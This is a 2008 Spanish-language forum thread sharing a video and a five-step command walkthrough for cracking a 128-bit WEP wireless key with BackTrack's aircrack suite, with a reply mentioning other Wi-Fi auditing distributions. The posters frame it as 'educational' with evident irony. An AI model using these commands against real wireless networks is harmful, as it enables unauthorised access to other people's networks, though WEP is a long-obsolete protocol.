PDA

Ver la versión completa : Crackeando clave WEP 128 bits con BackTrack en 15 minutos



LUK
07-01-2008, 15:16
Este video muestra como crackear una clave WEP de 128 bits con BackTrack en 15 minutos. Ya sabéis que le contenido del video es totalmente educativo :)


http://www.youtube.com/watch?v=4IpOS27J5a8

Teneis el video en mucha mayor calidad aqui: http://www.securitydistro.com/index.php?option=com_content&task=view&id=127&Itemid=32
Porque sino para ver los comandos desde youtube.... te puedes dejar la vista xD

Steps:

1) Set wireless card to monitor mode
ex. iwconfig wlan0 mode monitor

2) Run airodump to capture IVs
ex. airodump wlan0 /tmp/dump

3) Use aireplay to continually send copies of packets, so you can gather IVs faster
ex. aireplay -2 wlan0 (then select a packet that has the same BSSID as the wireless router you are cracking)

4) Wait! in this video a wait 13 minutes and by that time I have collected 529,340 IVs (I have cracked WEP with only 200,000 IVs but it took 9 minutes to crack.)

5) Crack the WEP password with aircrack!
ex. aircrack /tmp/dump-01.cap (the location of your airodump dump file)
With over 500,000 IVs it takes about 11 seconds to crack

clarinetista
07-01-2008, 20:38
Imprimiendo para modo educativo....

PD: También sirve las versiones de Wifislax y WifiWay